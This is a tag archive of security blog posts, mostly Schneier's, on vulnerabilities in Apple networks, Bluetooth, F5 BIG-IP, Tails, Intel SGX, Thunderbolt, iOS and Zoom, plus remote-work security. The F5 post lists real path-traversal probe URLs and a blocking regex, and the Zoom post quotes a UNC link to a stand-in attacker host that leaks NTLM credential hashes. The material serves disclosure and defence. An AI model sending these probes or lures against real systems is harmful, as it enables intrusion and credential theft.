Tag Archives: vulnerabilities

Hacking Apple for Profit

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/10/hacking-apple-for-profit.html

Five researchers hacked Apple’s networks — not its products — and found fifty-five vulnerabilities. So far, they have received $289K.

One of the worst of all the bugs they found would have allowed criminals to create a worm that would automatically steal all the photos, videos, and documents from someone’s iCloud account and then do the same to the victim’s contacts.

Lots of details in this blog post by one of the hackers.

Hacking a Coffee Maker

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/09/hacking-a-coffee-maker.html

As expected, IoT devices are filled with vulnerabilities:

As a thought experiment, Martin Hron, a researcher at security company Avast, reverse engineered one of the older coffee makers to see what kinds of hacks he could do with it. After just a week of effort, the unqualified answer was: quite a lot. Specifically, he could trigger the coffee maker to turn on the burner, dispense water, spin the bean grinder, and display a ransom message, all while beeping repeatedly. Oh, and by the way, the only way to stop the chaos was to unplug the power cord.

[…]

In any event, Hron said the ransom attack is just the beginning of what an attacker could do. With more work, he believes, an attacker could program a coffee maker — ­and possibly other appliances made by Smarter — ­to attack the router, computers, or other devices connected to the same network. And the attacker could probably do it with no overt sign anything was amiss.

New Bluetooth Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/09/new-bluetooth-vulnerability.html

There’s a new unpatched Bluetooth vulnerability:

The issue is with a protocol called Cross-Transport Key Derivation (or CTKD, for short). When, say, an iPhone is getting ready to pair up with a Bluetooth-powered device, CTKD’s role is to set up two separate authentication keys for that phone: one for a “Bluetooth Low Energy” device, and one for a device using what’s known as the “Basic Rate/Enhanced Data Rate” standard. Different devices require different amounts of data — and battery power — from a phone. Being able to toggle between the standards needed for Bluetooth devices that take a ton of data (like a Chromecast), and those that require a bit less (like a smartwatch) is more efficient. Incidentally, it might also be less secure.

According to the researchers, if a phone supports both of those standards but doesn’t require some sort of authentication or permission on the user’s end, a hackery sort who’s within Bluetooth range can use its CTKD connection to derive its own competing key. With that connection, according to the researchers, this sort of ersatz authentication can also allow bad actors to weaken the encryption that these keys use in the first place — which can open its owner up to more attacks further down the road — or to perform “man in the middle” style attacks that snoop on unprotected data being sent by the phone’s apps and services.

Another article:

Patches are not immediately available at the time of writing. The only way to protect against BLURtooth attacks is to control the environment in which Bluetooth devices are paired, in order to prevent man-in-the-middle attacks, or pairings with rogue devices carried out via social engineering (tricking the human operator).

However, patches are expected to be available at some point. When they are, they will most likely be integrated as firmware or operating system updates for Bluetooth-capable devices.

The timeline for these updates is, for the moment, unclear, as device vendors and OS makers usually work on different schedules, and some may not prioritize security patches as highly as others. The number of vulnerable devices is also unclear and hard to quantify.

Many Bluetooth devices can’t be patched.

Final note: this seems to be another example of simultaneous discovery:

According to the Bluetooth SIG, the BLURtooth attack was discovered independently by two groups of academics from the École Polytechnique Fédérale de Lausanne (EPFL) and Purdue University.

Smart Lock Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/08/smart_lock_vuln.html

Yet another Internet-connected door lock is insecure:

Sold by retailers including Amazon, Walmart, and Home Depot, U-Tec’s $139.99 UltraLoq is marketed as a “secure and versatile smart deadbolt that offers keyless entry via your Bluetooth-enabled smartphone and code.”

Users can share temporary codes and ‘Ekeys’ with friends and guests for scheduled access, but according to Tripwire researcher Craig Young, a hacker able to sniff out the device’s MAC address can help themselves to an access key, too.

UltraLoq eventually fixed the vulnerabilities, but not in a way that should give you any confidence that they know what they’re doing.

EDITED TO ADD (8/12): More.

CVE-2020-5902: Helping to protect against the F5 TMUI RCE vulnerability

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/cve-2020-5902-helping-to-protect-against-the-f5-tmui-rce-vulnerability/

Cloudflare has deployed a new managed rule protecting customers against a remote code execution vulnerability that has been found in F5 BIG-IP’s web-based Traffic Management User Interface (TMUI). Any customer who has access to the Cloudflare Web Application Firewall (WAF) is automatically protected by the new rule (100315) that has a default action of BLOCK.

Initial testing on our network has shown that attackers began probing and trying to exploit this vulnerability on July 3.

F5 has published detailed instructions on how to patch affected devices, how to detect whether attempts have been made to exploit the vulnerability on a device, and how to add a custom mitigation. If you have an F5 device, read their detailed mitigations before reading the rest of this blog post.

The most popular probe URL appears to be /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp followed by /tmui/login.jsp/..;/tmui/util/getTabSet.jsp, /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp and /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp. All contain the critical pattern ..; which is at the heart of the vulnerability.

On July 3 we saw O(1k) probes ramping to O(1m) yesterday. This is because simple test patterns have been added to scanning tools and small test programs made available by security researchers.

The Vulnerability

The vulnerability was disclosed by the vendor on July 1 and allows both authenticated and unauthenticated users to perform remote code execution (RCE).

Remote code execution is a type of code injection that gives the attacker the ability to run arbitrary code on the target application, allowing them, in scenarios such as this one, to gain privileged access and perform a full system takeover.

The vulnerability affects the administration interface only (the management dashboard), not the underlying data plane provided by the application.

How to Mitigate

If updating the application is not possible, the attack can be mitigated by blocking all requests that match the following regular expression in the URL:

.*\.\.;.*

The above regular expression matches two dot characters (.) followed by a semicolon within any sequence of characters.
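
To see the rule’s logic in action, here is a minimal Python sketch (ours, not the WAF implementation) applying the same pattern to the probe URLs listed earlier:

import re

# re.search makes the leading and trailing .* of the rule's pattern implicit.
PATTERN = re.compile(r"\.\.;")

urls = [
    "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp",  # probe
    "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp",   # probe
    "/tmui/login.jsp",                                          # legitimate login page
]
for url in urls:
    print("BLOCK" if PATTERN.search(url) else "ALLOW", url)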

Customers who use the Cloudflare WAF and have their F5 BIG-IP TMUI interface proxied behind Cloudflare are already automatically protected from this vulnerability by rule 100315. If you wish to turn off the rule or change the default action:

  1. Head over to the Cloudflare Firewall, click on Managed Rules, and follow the advanced link under the Cloudflare Managed Rule set,
  2. Search for rule ID: 100315,
  3. Select any appropriate action or disable the rule.

Facebook Helped Develop a Tails Exploit

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/06/facebook_helped.html

This is a weird story:

Hernandez was able to evade capture for so long because he used Tails, a version of Linux designed for users at high risk of surveillance and which routes all inbound and outbound connections through the open-source Tor network to anonymize them. According to Vice, the FBI had tried to hack into Hernandez’s computer but failed, as the approach they used “was not tailored for Tails.” Hernandez then proceeded to mock the FBI in subsequent messages, two Facebook employees told Vice.

Facebook had tasked a dedicated employee with unmasking Hernandez, developed an automated system to flag recently created accounts that messaged minors, and made catching Hernandez a priority for its security teams, according to Vice. They also paid a third-party contractor “six figures” to help develop a zero-day exploit in Tails: a bug in its video player that enabled them to retrieve the real IP address of a person viewing a clip. Three sources told Vice that an intermediary passed the tool on to the FBI, who then obtained a search warrant to have one of the victims send a modified video file to Hernandez (a tactic the agency has used before).

[…]

Facebook also never notified the Tails team of the flaw — breaking with a long industry tradition of disclosure, in which the relevant developers are notified of vulnerabilities in advance of them becoming public so they have a chance at implementing a fix. Sources told Vice that since an upcoming Tails update was slated to strip the vulnerable code, Facebook didn’t bother to report the bug, even though the company had no reason to believe Tails developers had ever discovered it themselves.

[…]

“The only acceptable outcome to us was Buster Hernandez facing accountability for his abuse of young girls,” a Facebook spokesperson told Vice. “This was a unique case, because he was using such sophisticated methods to hide his identity, that we took the extraordinary steps of working with security experts to help the FBI bring him to justice.”

I agree with that last paragraph. I’m fine with the FBI using vulnerabilities: lawful hacking, it’s called. I’m less okay with Facebook paying for a Tails exploit, giving it to the FBI, and then keeping its existence secret.

Another article.

EDITED TO ADD: This post has been translated into Portuguese.

Another Intel Speculative Execution Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/06/another_intel_s.html

Remember Spectre and Meltdown? Back in early 2018, I wrote:

Spectre and Meltdown are pretty catastrophic vulnerabilities, but they only affect the confidentiality of data. Now that they — and the research into the Intel ME vulnerability — have shown researchers where to look, more is coming — and what they’ll find will be worse than either Spectre or Meltdown. There will be vulnerabilities that will allow attackers to manipulate or delete data across processes, potentially fatal in the computers controlling our cars or implanted medical devices. These will be similarly impossible to fix, and the only strategy will be to throw our devices away and buy new ones.

That has turned out to be true. Here’s a new vulnerability:

On Tuesday, two separate academic teams disclosed two new and distinctive exploits that pierce Intel’s Software Guard eXtensions (SGX), by far the most sensitive region of the company’s processors.

[…]

The new SGX attacks are known as SGAxe and CrossTalk. Both break into the fortified CPU region using separate side-channel attacks, a class of hack that infers sensitive data by measuring timing differences, power consumption, electromagnetic radiation, sound, or other information from the systems that store it. The assumptions for both attacks are roughly the same. An attacker has already broken the security of the target machine through a software exploit or a malicious virtual machine that compromises the integrity of the system. While that’s a tall bar, it’s precisely the scenario that SGX is supposed to defend against.

Another news article.

Security Analysis of the Democracy Live Online Voting System

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/06/security_analys_7.html

New research: “Security Analysis of the Democracy Live Online Voting System”:

Abstract: Democracy Live’s OmniBallot platform is a web-based system for blank ballot delivery, ballot marking, and (optionally) online voting. Three states — Delaware, West Virginia, and New Jersey — recently announced that they will allow certain voters to cast votes online using OmniBallot, but, despite the well established risks of Internet voting, the system has never been the subject of a public, independent security review.

We reverse engineered the client-side portion of OmniBallot, as used in Delaware, in order to detail the system’s operation and analyze its security. We find that OmniBallot uses a simplistic approach to Internet voting that is vulnerable to vote manipulation by malware on the voter’s device and by insiders or other attackers who can compromise Democracy Live, Amazon, Google, or Cloudflare. In addition, Democracy Live, which appears to have no privacy policy, receives sensitive personally identifiable information — including the voter’s identity, ballot selections, and browser fingerprint — that could be used to target political ads or disinformation campaigns. Even when OmniBallot is used to mark ballots that will be printed and returned in the mail, the software sends the voter’s identity and ballot choices to Democracy Live, an unnecessary security risk that jeopardizes the secret ballot. We recommend changes to make the platform safer for ballot delivery and marking. However, we conclude that using OmniBallot for electronic ballot return represents a severe risk to election security and could allow attackers to alter election results without detection.

News story.

EDITED TO ADD: This post has been translated into Portuguese.

Bluetooth Vulnerability: BIAS

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/05/bluetooth_vulne_1.html

This is new research on a Bluetooth vulnerability (called BIAS) that allows someone to impersonate a trusted device:

Abstract: Bluetooth (BR/EDR) is a pervasive technology for wireless communication used by billions of devices. The Bluetooth standard includes a legacy authentication procedure and a secure authentication procedure, allowing devices to authenticate to each other using a long term key. Those procedures are used during pairing and secure connection establishment to prevent impersonation attacks. In this paper, we show that the Bluetooth specification contains vulnerabilities that enable impersonation attacks during secure connection establishment. Such vulnerabilities include the lack of mandatory mutual authentication, overly permissive role switching, and an authentication procedure downgrade. We describe each vulnerability in detail, and we exploit them to design, implement, and evaluate master and slave impersonation attacks on both the legacy authentication procedure and the secure authentication procedure. We refer to our attacks as Bluetooth Impersonation AttackS (BIAS).

Our attacks are standard-compliant, and are therefore effective against any standard-compliant Bluetooth device regardless of the Bluetooth version, the security mode (e.g., Secure Connections), the device manufacturer, and the implementation details. Our attacks are stealthy because the Bluetooth standard does not require notifying end users about the outcome of an authentication procedure, or about the lack of mutual authentication. To confirm that the BIAS attacks are practical, we successfully conduct them against 31 Bluetooth devices (28 unique Bluetooth chips) from major hardware and software vendors, implementing all the major Bluetooth versions, including Apple, Qualcomm, Intel, Cypress, Broadcom, Samsung, and CSR.

News articles.

Attack Against PC Thunderbolt Port

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/05/attack_against_2.html

The attack requires physical access to the computer, but it’s pretty devastating:

On Thunderbolt-enabled Windows or Linux PCs manufactured before 2019, his technique can bypass the login screen of a sleeping or locked computer — and even its hard disk encryption — to gain full access to the computer’s data. And while his attack in many cases requires opening a target laptop’s case with a screwdriver, it leaves no trace of intrusion and can be pulled off in just a few minutes. That opens a new avenue to what the security industry calls an “evil maid attack,” the threat of any hacker who can get alone time with a computer in, say, a hotel room. Ruytenberg says there’s no easy software fix, only disabling the Thunderbolt port altogether.

“All the evil maid needs to do is unscrew the backplate, attach a device momentarily, reprogram the firmware, reattach the backplate, and the evil maid gets full access to the laptop,” says Ruytenberg, who plans to present his Thunderspy research at the Black Hat security conference this summer, or the virtual conference that may replace it. “All of this can be done in under five minutes.”

Lots of details in the article above, and on the attack website. (We know it’s a modern hack, because it comes with its own website and logo.)

Intel responds.

EDITED TO ADD (5/14): More.

iOS XML Bug

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/05/ios_xml_bug.html

This is a good explanation of an iOS bug that allowed someone to break out of the application sandbox. A summary:

What a crazy bug, and Siguza’s explanation is very cogent. Basically, it comes down to this:

  • XML is terrible.
  • iOS uses XML for Plists, and Plists are used everywhere in iOS (and MacOS).
  • iOS’s sandboxing system depends upon three different XML parsers, which interpret slightly invalid XML input in slightly different ways.

So Siguza’s exploit — which granted an app full access to the entire file system, and more — uses malformed XML comments constructed in a way that one of iOS’s XML parsers sees its declaration of entitlements one way, and another XML parser sees it another way. The XML parser used to check whether an application should be allowed to launch doesn’t see the fishy entitlements because it thinks they’re inside a comment. The XML parser used to determine whether an already running application has permission to do things that require entitlements sees the fishy entitlements and grants permission.
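
To make the failure mode concrete, here is a toy Python sketch (our illustration, not Siguza’s payload and not Apple’s parsers) in which two comment-stripping routines disagree about where a comment ends:

import re

doc = "<dict><!-- a --><key>fishy-entitlement</key><!-- b --></dict>"

# Parser 1: lazy match, strips each comment separately, so it sees the key.
seen_at_runtime = re.sub(r"<!--.*?-->", "", doc)

# Parser 2: greedy match, strips from the first <!-- to the last -->,
# so the key vanishes inside one giant "comment".
seen_at_launch = re.sub(r"<!--.*-->", "", doc)

print(seen_at_runtime)  # <dict><key>fishy-entitlement</key></dict>
print(seen_at_launch)   # <dict></dict>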

This is fixed in the new iOS release, 13.5 beta 3.

Comment:

Implementing 4 different parsers is just asking for trouble, and the “fix” is of the crappiest sort, bolting on more crap to check they’re doing the right thing in this single case. None of this is encouraging.

More commentary. Hacker News thread.

Vulnerability Finding Using Machine Learning

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/vulnerability_f.html

Microsoft is training a machine-learning system to find software bugs:

At Microsoft, 47,000 developers generate nearly 30 thousand bugs a month. These items get stored across over 100 AzureDevOps and GitHub repositories. To better label and prioritize bugs at that scale, we couldn’t just apply more people to the problem. However, large volumes of semi-curated data are perfect for machine learning. Since 2001 Microsoft has collected 13 million work items and bugs. We used that data to develop a process and machine learning model that correctly distinguishes between security and non-security bugs 99 percent of the time and accurately identifies the critical, high priority security bugs, 97 percent of the time.
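
This isn’t Microsoft’s pipeline, but a minimal sketch of that kind of security/non-security triage, using scikit-learn on invented bug titles:

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Invented stand-ins for the 13 million labeled work items.
titles = [
    "buffer overflow in image parser",       # security
    "XSS in comment field",                  # security
    "settings button misaligned on resize",  # not security
    "typo in error dialog text",             # not security
]
is_security = [1, 1, 0, 0]

model = make_pipeline(TfidfVectorizer(), LogisticRegression())
model.fit(titles, is_security)

print(model.predict(["heap overflow in PDF parser"]))  # expect [1]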

News article.

I wrote about this in 2018:

The problem of finding software vulnerabilities seems well-suited for ML systems. Going through code line by line is just the sort of tedious problem that computers excel at, if we can only teach them what a vulnerability looks like. There are challenges with that, of course, but there is already a healthy amount of academic literature on the topic — and research is continuing. There’s every reason to expect ML systems to get better at this as time goes on, and some reason to expect them to eventually become very good at it.

Finding vulnerabilities can benefit both attackers and defenders, but it’s not a fair fight. When an attacker’s ML system finds a vulnerability in software, the attacker can use it to compromise systems. When a defender’s ML system finds the same vulnerability, he or she can try to patch the system or program network defenses to watch for and block code that tries to exploit it.

But when the same system is in the hands of a software developer who uses it to find the vulnerability before the software is ever released, the developer fixes it so it can never be used in the first place. The ML system will probably be part of his or her software design tools and will automatically find and fix vulnerabilities while the code is still in development.

Fast-forward a decade or so into the future. We might say to each other, “Remember those years when software vulnerabilities were a thing, before ML vulnerability finders were built into every compiler and fixed them before the software was ever released? Wow, those were crazy years.” Not only is this future possible, but I would bet on it.

Getting from here to there will be a dangerous ride, though. Those vulnerability finders will first be unleashed on existing software, giving attackers hundreds if not thousands of vulnerabilities to exploit in real-world attacks. Sure, defenders can use the same systems, but many of today’s Internet of Things (IoT) systems have no engineering teams to write patches and no ability to download and install patches. The result will be hundreds of vulnerabilities that attackers can find and use.

Security and Privacy Implications of Zoom

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/security_and_pr_1.html

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace). So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.'” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance-based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is at best sloppy, and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Windows credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings — such as \\attacker.example.com/C$ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.
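
A minimal sketch of the obvious client-side mitigation: detect UNC-style strings before converting chat text into clickable links. This is our illustration, not Zoom’s code; the hostname comes from the quoted example:

import re

# Matches \\host\share (or \\host/share) strings of the kind Zoom was
# auto-converting into clickable links.
UNC_RE = re.compile(r"\\\\[\w.-]+[\\/][\w$.-]+")

messages = [
    r"notes are at \\attacker.example.com\C$",
    "agenda: https://example.com/agenda",
]
for msg in messages:
    if UNC_RE.search(msg):
        print("render as plain text (UNC path):", msg)
    else:
        print("safe to linkify:", msg)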

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported:

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.
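
ECB’s weakness is easy to demonstrate. A minimal sketch using the Python cryptography library (our example, nothing here is from Zoom’s code): identical plaintext blocks encrypt to identical ciphertext blocks, so structure survives encryption.

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(16)                 # AES-128, as Citizen Lab observed
plaintext = b"sixteen byte blk" * 2  # two identical 16-byte blocks

ecb = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
ct = ecb.update(plaintext) + ecb.finalize()
print(ct[:16] == ct[16:])            # True: the repetition leaks through

ctr = Cipher(algorithms.AES(key), modes.CTR(os.urandom(16))).encryptor()
ct = ctr.update(plaintext) + ctr.finalize()
print(ct[:16] == ct[16:])            # False: a sane mode hides it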

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sorts of mischief.

“Zoombombing” is the most visible problem. People are finding open Zoom meetings, classes, and events; joining them; and sharing their screens to broadcast offensive content — porn, mostly — to everyone. It’s awful if you’re the victim, and a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying IDs, looking for meetings. This isn’t new; Check Point Research reported this last summer. Instead of making the meeting IDs longer or more complicated — which it should have done — it enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.
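
Some back-of-the-envelope arithmetic shows why ID length matters; both figures below are illustrative assumptions, not Zoom’s real numbers:

# All figures illustrative, not Zoom's actual numbers.
id_space = 10**9          # 9-digit meeting IDs
live_meetings = 10_000    # assumed number of concurrent meetings
tries_per_hit = id_space / live_meetings
print(f"{tries_per_hit:,.0f} random guesses per live meeting found")

# A 16-character alphanumeric ID would make the same search hopeless:
print(f"{36**16 / live_meetings:.1e} guesses per hit")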

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or — better yet — abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

Steve Bellovin’s comments.

Meanwhile, lots of Zoom video recordings are available on the Internet. The article doesn’t have any useful details about how they got there:

Videos viewed by The Post included one-on-one therapy sessions; a training orientation for workers doing telehealth calls, which included people’s names and phone numbers; small-business meetings, which included private company financial statements; and elementary-school classes, in which children’s faces, voices and personal details were exposed.

Many of the videos include personally identifiable information and deeply intimate conversations, recorded in people’s homes. Other videos include nudity, such as one in which an aesthetician teaches students how to give a Brazilian wax.

[…]

Many of the videos can be found on unprotected chunks of Amazon storage space, known as buckets, which are widely used across the Web. Amazon buckets are locked down by default, but many users make the storage space publicly accessible either inadvertently or to share files with other people.
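
For anyone storing recordings this way, checking a bucket’s public-access settings is straightforward with boto3 (the bucket name is hypothetical; assumes AWS credentials are configured):

import boto3

s3 = boto3.client("s3")
# Raises ClientError (NoSuchPublicAccessBlockConfiguration) if the bucket
# has no public-access block configured at all.
resp = s3.get_public_access_block(Bucket="example-recordings-bucket")
print(resp["PublicAccessBlockConfiguration"])
# All four flags should be True for a locked-down bucket.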

EDITED TO ADD (4/4): New York City has banned Zoom from its schools.

Work-from-Home Security Advice

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/work-from-home_.html

SANS has made freely available its “Work-from-Home Awareness Kit.”

When I think about how the security measures prompted by COVID-19 are affecting organizational networks, I see several interrelated problems:

One, employees are working from their home networks and sometimes from their home computers. These systems are more likely to be out of date, unpatched, and unprotected. They are more vulnerable to attack simply because they are less secure.

Two, sensitive organizational data will likely migrate outside of the network. Employees working from home are going to save data on their own computers, where they aren’t protected by the organization’s security systems. This makes the data more likely to be hacked and stolen.

Three, employees are more likely to access their organizational networks insecurely. If the organization is lucky, they will have already set up a VPN for remote access. If not, they’re either trying to get one quickly or not bothering at all. Handing people VPN software to install and use with zero training is a recipe for security mistakes, but not using a VPN is even worse.

Four, employees are being asked to use new and unfamiliar tools like Zoom to replace face-to-face meetings. Again, these hastily set-up systems are likely to be insecure.

Five, the general chaos of “doing things differently” is an opening for attack. Tricks like business email compromise, where an employee gets a fake email from a senior executive asking him to transfer money to some account, will be more successful when the employee can’t walk down the hall to confirm the email’s validity — and when everyone is distracted and so many other things are being done differently.

Worrying about network security seems almost quaint in the face of the massive health risks from COVID-19, but attacks on infrastructure can have effects far greater than the infrastructure itself. Stay safe, everyone, and help keep your networks safe as well.

Security of Health Information

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/security_of_hea.html

The world is racing to contain the new COVID-19 virus that is spreading around the globe with alarming speed. Right now, pandemic disease experts at the World Health Organization (WHO), the US Centers for Disease Control and Prevention (CDC), and other public-health agencies are gathering information to learn how and where the virus is spreading. To do so, they are using a variety of digital communications and surveillance systems. Like much of the medical infrastructure, these systems are highly vulnerable to hacking and interference.

That vulnerability should be deeply concerning. Governments and intelligence agencies have long had an interest in manipulating health information, both in their own countries and abroad. They might do so to prevent mass panic, avert damage to their economies, or avoid public discontent (if officials made grave mistakes in containing an outbreak, for example). Outside their borders, states might use disinformation to undermine their adversaries or disrupt an alliance between other nations. A sudden epidemic — when countries struggle to manage not just the outbreak but its social, economic, and political fallout — is especially tempting for interference.

In the case of COVID-19, such interference is already well underway. That fact should not come as a surprise. States hostile to the West have a long track record of manipulating information about health issues to sow distrust. In the 1980s, for example, the Soviet Union spread the false story that the US Department of Defense bioengineered HIV in order to kill African Americans. This propaganda was effective: some 20 years after the original Soviet disinformation campaign, a 2005 survey found that 48 percent of African Americans believed HIV was concocted in a laboratory, and 15 percent thought it was a tool of genocide aimed at their communities.

More recently, in 2018, Russia undertook an extensive disinformation campaign to amplify the anti-vaccination movement using social media platforms like Twitter and Facebook. Researchers have confirmed that Russian trolls and bots tweeted anti-vaccination messages at up to 22 times the rate of average users. Exposure to these messages, other researchers found, significantly decreased vaccine uptake, endangering individual lives and public health.

Last week, US officials accused Russia of spreading disinformation about COVID-19 in yet another coordinated campaign. Beginning around the middle of January, thousands of Twitter, Facebook, and Instagram accounts — many of which had previously been tied to Russia — had been seen posting nearly identical messages in English, German, French, and other languages, blaming the United States for the outbreak. Some of the messages claimed that the virus is part of a US effort to wage economic war on China, others that it is a biological weapon engineered by the CIA.

As much as this disinformation can sow discord and undermine public trust, the far greater vulnerability lies in the United States’ poorly protected emergency-response infrastructure, including the health surveillance systems used to monitor and track the epidemic. By hacking these systems and corrupting medical data, states with formidable cybercapabilities can change and manipulate data right at the source.

Here is how it would work, and why we should be so concerned. Numerous health surveillance systems are monitoring the spread of COVID-19 cases, including the CDC’s influenza surveillance network. Almost all testing is done at a local or regional level, with public-health agencies like the CDC only compiling and analyzing the data. Only rarely is an actual biological sample sent to a high-level government lab. Many of the clinics and labs providing results to the CDC no longer file reports as in the past, but have several layers of software to store and transmit the data.

